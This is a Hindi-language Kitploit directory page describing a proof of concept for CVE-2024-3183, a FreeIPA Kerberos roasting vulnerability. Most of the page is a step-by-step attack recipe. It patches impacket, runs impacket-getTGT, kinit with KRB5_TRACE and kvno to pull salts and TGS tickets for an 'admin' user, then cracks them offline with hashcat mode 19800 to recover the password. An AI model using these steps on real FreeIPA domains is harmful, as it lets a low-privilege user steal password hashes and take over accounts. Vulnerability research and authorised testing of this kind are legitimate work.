Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3183-POC — CVE-2024-3183 (FreeIPA Rosting) के लिए POC | Kitploit
उपकरण/GitHubGitHub/im10n/cve-2024-3183-poc
पासवर्ड हमलेभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

CVE-2024-3183 (FreeIPA Rosting) के लिए POC

रिपॉजिटरी देखें
29242 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3183-POC

CVE-2024-3183 (FreeIPA Rosting) के लिए POC

प्रभाव: एक निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता सभी डोमेन उपयोगकर्ताओं के पासवर्ड का हैश प्राप्त कर सकता है और ऑफ़लाइन ब्रूट फोर्स (kerberoasting) कर सकता है।

impacket-getTGT पैच करें:

  1. impacket/krb5/kerberosv5.py में decoder.decode.defaultErrorState = stGetValueDecoderByTag जोड़ें।
  2. आनंद लें!

POC1:

  1. impacket/krb5/kerberosv5.py में decoder.decode.defaultErrorState = stGetValueDecoderByTag जोड़ें।
  2. आप एक ही कमांड में salt प्राप्त करने के लिए -service विकल्प और -debug विकल्प के साथ impacket-getTGT का उपयोग कर सकते हैं। impacket-getTGT test.local/user -debug -service admin

POC2:

  1. सबसे पहले, पहले से समझौता किए गए उपयोगकर्ता "admin" के लिए एक TGT टिकट का अनुरोध करते हैं। kinit user foto1
  2. दूसरे, हम "admin" उपयोगकर्ता का salt पता करेंगे: printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. "admin" के लिए TGS प्राप्त करें: kvno admin foto foto3
  4. TGS की ब्रूट फोर्स के लिए python स्क्रिप्ट (या विशिष्ट salt के साथ hashcat mod 19800) का उपयोग करें foto4

1 - TGS, 2 - SALT, 3 - पासवर्ड।

  1. बधाई हो, अब हमारे पास उपयोगकर्ता “admin” का पासवर्ड है।

POC3:

  1. आप एक ही कदम में kinit का उपयोग कर सकते हैं: kinit -S target user

और आपको TGT मिलता है जो लक्षित उपयोगकर्ता की कुंजी से एन्क्रिप्ट किया गया होता है।

टूल डाउनलोड करें